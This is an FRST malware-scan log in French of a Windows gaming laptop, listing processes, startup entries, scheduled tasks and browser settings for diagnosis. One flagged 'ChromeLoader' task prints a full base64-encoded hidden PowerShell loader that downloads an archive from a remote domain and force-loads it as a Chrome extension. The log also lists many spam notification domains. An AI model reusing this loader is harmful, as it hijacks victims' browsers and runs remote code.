Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 27-12-2021 Exécuté par Shadow (administrateur) sur KARDINALLAPTOP (Blade Shadow Computer) (09-01-2022 18:35:43) Exécuté depuis C:\Users\Shadow\Downloads Profils chargés: Shadow Plate-forme: Microsoft Windows 10 Famille Version 21H1 19043.1415 (X64) Langue: Anglais (Royaume-Uni) -> Français (France) Navigateur par défaut: Opera Mode d'amorçage: Normal ==================== Processus (Avec liste blanche) ================= (Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.) (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe (Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe (BattlEye Innovations e.K. -> ) C:\Program Files (x86)\Common Files\BattlEye\BEService.exe (BattlEye Innovations e.K. -> BattlEye Innovations) C:\R6S\Tom Clancy's Rainbow Six Siege\rainbowsix_be.exe (Blade -> ) [Fichier non signé] C:\Program Files\Blade SAS\ShadowSerial\ShadowSerial.exe <2> (Blade -> ) C:\Program Files\Blade Group\ShadowManager\ShadowManager.exe (Blade -> ) C:\Program Files\Blade Group\ShadowOperator\ShadowOperator.exe (Blade -> ) C:\Program Files\Blade Group\ShadowProcessator\shadow_crash.exe (Blade -> ) C:\Program Files\Blade Group\ShadowServicesWatcher\ShadowServicesWatcher.exe (Blade -> ) C:\Program Files\Blade Group\ShadowSystemWatcher\ShadowSystemWatcher.exe (Blade -> Blade Group) C:\Program Files\Blade Group\ShadowStreamer\ShadowStreamer.exe <2> (Blade -> Blade) C:\Program Files\Blade Group\ShadowProcessator\ShadowProcessator.exe (Blade Group) [Fichier non signé] C:\Program Files\Blade Group\ShadowUsbOverIp\ShadowUsbOverIp.exe (DeepL GmbH -> DeepL GmbH) C:\Users\Shadow\AppData\Local\DeepL\app-3.1.13276\DeepL.exe (DeepL GmbH -> The CefSharp Authors) C:\Users\Shadow\AppData\Local\DeepL\app-3.1.13276\CefSharp.BrowserSubprocess.exe <3> (Discord Inc. -> Discord Inc.) C:\Users\Shadow\AppData\Local\Discord\app-1.0.9003\Discord.exe <12> (Element 5 Limited Liability Company -> ELTIMA Software) C:\Program Files\Blade Group\ShadowUsbOverIp\UsbService64.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_3.2110.13603.0_x64__8wekyb3d8bbwe\Cortana.exe (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_3.2110.13603.0_x64__8wekyb3d8bbwe\Win32Bridge.Server.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\GameBarPresenceWriter.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\msiexec.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCopyAccelerator.exe (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe (Node.js Foundation -> Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\libs\node.exe (Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <2> (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_0bc9105c62ca22fb\Display.NvContainer\NVDisplay.Container.exe <2> (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_0bc9105c62ca22fb\NVWMI\nvWmi64.exe <2> (Opera Software AS -> Opera Software) C:\Users\Shadow\AppData\Local\Programs\Opera GX\82.0.4227.50\opera_crashreporter.exe (Opera Software AS -> Opera Software) C:\Users\Shadow\AppData\Local\Programs\Opera GX\opera.exe <14> (Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.187.1.13\OverwolfHelper.exe (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.187.1.13\OverwolfHelper64.exe (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\0.187.1.13\OverwolfBrowser.exe <9> (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\Overwolf.exe (Skutta, Kristjan -> ) D:\SteamLibrary\steamapps\common\wallpaper_engine\wallpaper32.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft) C:\R6S\Tom Clancy's Rainbow Six Siege\RainbowSix.exe (Ubisoft Entertainment Sweden AB -> Ubisoft) D:\Ubisoft Game Launcher\UbisoftGameLauncher.exe (Ubisoft Entertainment Sweden AB -> Ubisoft) D:\Ubisoft Game Launcher\upc.exe (Ubisoft Entertainment Sweden AB -> Ubisoft) D:\Ubisoft Game Launcher\UplayWebCore.exe <8> (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7> (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe ==================== Registre (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706344 2021-09-27] (Oracle America, Inc. -> Oracle Corporation) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4267432 2021-12-16] (Valve Corp. -> Valve Corporation) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [Discord] => C:\Users\Shadow\AppData\Local\Discord\Update.exe [1512608 2021-09-21] (Discord Inc. -> GitHub) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize (Pas de fichier) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [WallpaperEngine] => D:\SteamLibrary\steamapps\common\wallpaper_engine\wallpaper32.exe [2703520 2021-12-04] (Skutta, Kristjan -> ) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [144008 2019-10-22] (Adobe Inc. -> Adobe Systems Incorporated) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe [1802072 2021-12-15] (Overwolf Ltd -> Overwolf Ltd.) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [DeepL] => C:\Users\Shadow\AppData\Local\DeepL\app-3.1.13276\DeepL.exe [141360 2021-12-16] (DeepL GmbH -> DeepL GmbH) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [Opera GX Stable] => C:\Users\Shadow\AppData\Local\Programs\Opera GX\launcher.exe [2192592 2021-12-22] (Opera Software AS -> Opera Software) HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\97.0.4692.71\Installer\chrmstp.exe [2022-01-07] (Google LLC -> Google LLC) Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION ==================== Tâches planifiées (Avec liste blanche) ============ (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {0273540E-8940-48C0-BFF0-1EE2A69D795A} - System32\Tasks\Opera GX scheduled Autoupdate 1641679505 => C:\Users\Shadow\AppData\Local\Programs\Opera GX\launcher.exe [2192592 2021-12-22] (Opera Software AS -> Opera Software) Task: {06A8C35E-D840-435B-82A5-C1085AF272C9} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [904904 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {10A3AD6D-A33E-4354-A4AF-7AE7898A2849} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-19] (Google LLC -> Google LLC) Task: {1F8E2B3F-BEB9-4CB3-B41F-CA2DBF371686} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {2E2AEBF4-F0DC-4B74-8E3E-3D901306A5E5} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2484056 2021-12-15] (Overwolf Ltd -> Overwolf LTD) Task: {2E998F90-BDC5-4EF5-A380-12E40B55198A} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {3F6166C6-09C5-4C23-B1D8-F0518F6D74F5} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [904904 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {67B74884-5131-42B4-A2C6-63F0DB1CD906} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-15] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {706A547B-98E4-4779-953F-33BB45107713} - System32\Tasks\Paranoid-SafetyNet => PowerShell.exe -ExecutionPolicy Bypass -File "C:\Program Files\Blade Group\ShadowInstallerClone\paranoid-script.ps1" Task: {772ECC21-ABF1-424D-8C37-8C353B968CA0} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-562984153-1162597116-1858956116-500 => C:\Users\Shadow\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (Pas de fichier) Task: {7A518F63-24AF-4A26-A588-AE315639C1C4} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-11-16] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log Task: {9300308D-C7D6-4228-9965-E41B1B41977D} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3341312 2021-12-09] (Nvidia Corporation -> NVIDIA Corporation) Task: {9ECD7178-5F8D-4BDA-A3DB-485717166FBA} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIAA9ACAAIgAkACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACkAXABhAHIAYwBoAGkAdgBlAC4AegBpAHAAIgAKACQAdABhAHMAawBOAGEAbQBlACAAPQAgACIAQwBoAHIAbwBtAGUATABvAGEAZABlAHIAIgAKACQAZABvAG0AYQBpAG4AIAA9ACAAIgBsAGUAYQByAG4AYQB0AGEAbABvAHUAawB0AC4AeAB5AHoAIgAKAAoAJABpAHMATwBwAGUAbgAgAD0AIAAwAAoAJABkAGQAIAA9ACAAMAAKACQAdgBlAHIAIAA9ACAAMAAKAAoAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAdABlAHIAIAAiAG4AYQBtAGUAPQAnAGMAaAByAG8AbQBlAC4AZQB4AGUAJwAiACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AAoACQBpAGYAKAAkAF8AIAAtAE0AYQB0AGMAaAAgACIAbABvAGEAZAAtAGUAeAB0AGUAbgBzAGkAbwBuACIAKQB7AAoACQAJAGIAcgBlAGEAawAKAAkAfQAKAAoACQAkAGkAcwBPAHAAZQBuACAAPQAgADEACgB9AAoACgBpAGYAKAAkAGkAcwBPAHAAZQBuACkAewAKAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQB4AHQAUABhAHQAaAAiACkAKQB7AAoACgAJAAkAdAByAHkAewAKAAkACQAJAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQAbwBtAGEAaQBuAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwACIAIAAtAG8AdQB0AGYAaQBsAGUAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIACgAJAAkAfQBjAGEAdABjAGgAewAKAAkACQAJAGIAcgBlAGEAawAKAAkACQB9AAoACgAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIAYQBsAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAgAC0ARgBvAHIAYwBlAAoACQAJAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgABMgcABhAHQAaAAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAgAC0ARgBvAHIAYwBlAAoACgAJAH0ACgAJAGUAbABzAGUAewAKAAoACQAJAHQAcgB5AHsACgAJAAkACQBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGMAbwBuAGYAUABhAHQAaAAiACkACgAJAAkACQB7AAoACQAJAAkACQAkAGMAbwBuAGYAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABjAG8AbgBmAFAAYQB0AGgACgAJAAkACQAJACQAYwBvAG4AZgAuAFMAcABsAGkAdAAoACIAOwAiACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAKAAkACQAJAAkACQBpAGYAIAAoACQAXwAgAC0ATQBhAHQAYwBoACAAIgBkAGQAIgApAAoACQAJAAkACQAJAHsACgAJAAkACQAJAAkACQAkAGQAZAAgAD0AIAAkAF8ALgBTAHAAbABpAHQAKAAnACIAJwApAFsAMQBdAAoACQAJAAkACQAJAH0AZQBsAHMAZQBpAGYAIAAoACQAXwAgAC0ATQBhAHQAYwBoACAAIgBFAHgAdABlAG4AcwBpAG8AbgBWAGUAcgBzAGkAbwBuACIAKQAKAAkACQAJAAkACQB7AAoACQAJAAkACQAJAAkAJAB2AGUAcgAgAD0AIAAkAF8ALgBTAHAAbABpAHQAKAAnACIAJwApAFsAMQBdAAoACQAJAAkACQAJAH0ACgAJAAkACQAJAH0ACgAJAAkACQB9AAoACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAGkAZgAgACgAJABkAGQAIAAtAGEAbgBkACAAJAB2AGUAcgApAHsACgAKAAoACQAJAAkAdAByAHkAewAKAAoACQAJAAkACQAkAHUAbgAgAD0AIAB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAG8AbQBhAGkAbgAvAHUAbgA/AGQAaQBkAD0AJABkAGQAJgB2AGUAcgA9ACQAdgBlAHIAIgAKAAoACQAJAAkACQBpAGYAKAAkAHUAbgAgAC0ATQBhAHQAYwBoACAAIgAkAGQAZAAiACkAewAKAAkACQAJAAkACQBVAG4AcgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgAkAHQAYQBzAGsATgBhAG0AZQAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUACgAJAAkACQAJAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAEyBwAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAgAC0ARgBvAHIAYwBlACAALQBSAGUAYwB1AHIAcwBlAAoACQAJAAkACQB9AAoACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAHQAcgB5AHsACgAJAAkACQAJAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQAbwBtAGEAaQBuAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwAD8AZABpAGQAPQAkAGQAZAAmAHYAZQByAD0AJAB2AGUAcgAiACAALQBvAHUAdABmAGkAbABlACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiAAoACQAJAAkAfQAKAAkACQAJAGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAKQB7AAoACQAJAAkACQBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAEwAaQB0AGUAcgBhAGwAUABhAHQAaAAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAZQB4AHQAUABhAHQAaAAiACAALQBGAG8AcgBjAGUACgAJAAkACQAJAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgABMgcABhAHQAaAAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAgAC0ARgBvAHIAYwBlAAoACQAJAAkAfQAKAAoACQAJAH0ACgAKAAkAfQAKAAoACQB0AHIAeQB7AAoACQAJAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAGMAaAByAG8AbQBlACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAkAF8ALgBDAGwAbwBzAGUATQBhAGkAbgBXAGkAbgBkAG8AdwAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAH0ACgAJAAkAcwB0AGEAcgB0ACAAYwBoAHIAbwBtAGUAIAAtAC0AbABvAGEAZAAtAGUAeAB0AGUAbgBzAGkAbwBuAD0AIgAkAGUAeAB0AFAAYQB0AGgAIgAsACAALQAtAHIAZQBzAHQAbwByAGUALQBsAGEAcwB0AC0AcwBlAHMAcwBpAG8AbgAsACAALQAtAG4AbwBlAHIAcgBkAGkAYQBsAG8AZwBzACwAIAAtAC0AZABpAHMAYQBiAGwAZQAtAHMAZQBzAHMAaQBvAG4ALQBjAHIAYQBzAGgAZQBkAC0AYgB1AGIAYgBsAGUACgAJAH0AYwBhAHQAYwBoAHsAfQAKAAoAfQA= /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4315 caractères en plus). (Pas de fichier) <==== ATTENTION Task: {A22471F1-0558-4A00-B6AF-19ACA0083ECB} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {A8CA996E-9EE4-4508-B735-152C75A7EAE9} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-15] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {B9E1AB13-995B-47BD-8215-5F034AC3FDE0} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [649216 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {C53F6145-5C69-41EF-B33C-28465902F644} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-19] (Google LLC -> Google LLC) Task: {CA98769F-6535-46CB-BE4B-3347FCC283CD} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-15] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {CB8BD936-9E72-465A-A18C-AD0701A10D2E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-15] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {D1F0B2B1-2B21-4B2C-934C-7D6B1062BBBC} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) ==================== Internet (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.) Tcpip\Parameters: [DhcpNameServer] 85.190.65.41 85.190.66.41 Tcpip\..\Interfaces\{54142b4c-e434-4619-98df-e88b7604a025}: [DhcpNameServer] 85.190.65.41 85.190.66.41 Edge: ======= Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)] Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)] Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)] Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)] Edge Profile: C:\Users\Shadow\AppData\Local\Microsoft\Edge\User Data\Default [2021-12-05] FireFox: ======== FF Plugin: @java.com/DTPlugin,version=11.311.2 -> C:\Program Files\Java\jre1.8.0_311\bin\dtplugin\npDeployJava1.dll [2021-11-07] (Oracle America, Inc. -> Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=11.311.2 -> C:\Program Files\Java\jre1.8.0_311\bin\plugin2\npjp2.dll [2021-11-07] (Oracle America, Inc. -> Oracle Corporation) Chrome: ======= CHR Profile: C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default [2022-01-08] CHR Notifications: Default -> hxxps://linkvertise.com; hxxps://work.ink; hxxps://www.instagram.com; hxxps://www13.nathanaeldan.pro; hxxps://www14.nathanaeldan.pro; hxxps://www15.nathanaeldan.pro; hxxps://www20.nathanaeldan.pro; hxxps://www20.normabass.pro; hxxps://www24.orvilleandrea.pro; hxxps://www25.alfonzoheriberto.pro; hxxps://www25.orvilleandrea.pro; hxxps://www28.nathanaeldan.pro; hxxps://www31.nathanaeldan.pro; hxxps://www32.freddyoctavio.pro; hxxps://www32.josueshah.pro; hxxps://www32.nathanaeldan.pro; hxxps://www32.normabass.pro; hxxps://www33.elbaestes.pro; hxxps://www33.nathanaeldan.pro; hxxps://www34.nathanaeldan.pro; hxxps://www38.nathanaeldan.pro; hxxps://www4.orvilleandrea.pro; hxxps://www43.normabass.pro; hxxps://www44.nathanaeldan.pro; hxxps://www45.rudyvalencia.pro; hxxps://www46.orvilleandrea.pro; hxxps://www47.nathanaeldan.pro; hxxps://www5.nathanaeldan.pro; hxxps://www52.orvilleandrea.pro; hxxps://www56.josueshah.pro; hxxps://www56.nathanaeldan.pro; hxxps://www57.nathanaeldan.pro; hxxps://www58.josueshah.pro; hxxps://www58.orvilleandrea.pro; hxxps://www59.myrnamooney.pro; hxxps://www6.nathanaeldan.pro; hxxps://www60.nathanaeldan.pro; hxxps://www66.freddyoctavio.pro; hxxps://www66.orvilleandrea.pro; hxxps://www71.elbaestes.pro; hxxps://www76.orvilleandrea.pro; hxxps://www8.rudyvalencia.pro; hxxps://www86.nathanaeldan.pro; hxxps://www87.freddyoctavio.pro; hxxps://www9.nathanaeldan.pro; hxxps://www9.orvilleandrea.pro; hxxps://www90.orvilleandrea.pro; hxxps://www91.josueshah.pro; hxxps://www91.nathanaeldan.pro; hxxps://www93.nathanaeldan.pro; hxxps://www94.nathanaeldan.pro; hxxps://www96.josueshah.pro; hxxps://www98.josueshah.pro CHR HomePage: Default -> hxxps://kali.org/ CHR StartupUrls: Default -> "hxxps://sitejeune.laregion.fr/" CHR Session Restore: Default -> est activé. CHR Extension: (Slides) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-10-19] CHR Extension: (Earth and Moon) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\afmfhbdfjlfminjglfhcgcblgicnfcka [2021-10-19] CHR Extension: (Docs) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-10-19] CHR Extension: (Google Drive) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-10-19] CHR Extension: (MEGA) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod [2021-12-24] CHR Extension: (YouTube) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-10-19] CHR Extension: (Gitpod - Always ready to code) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\dodmmooeoklaejobgleioelladacbeki [2021-10-19] CHR Extension: (Sheets) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-10-19] CHR Extension: (Google Docs hors connexion) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-11-30] CHR Extension: (AdBlock — le meilleur bloqueur de pubs) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2022-01-07] CHR Extension: (Instant Gaming) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\lbnoedlobifdhbpjkcfhcbdcjhampmne [2022-01-07] CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda 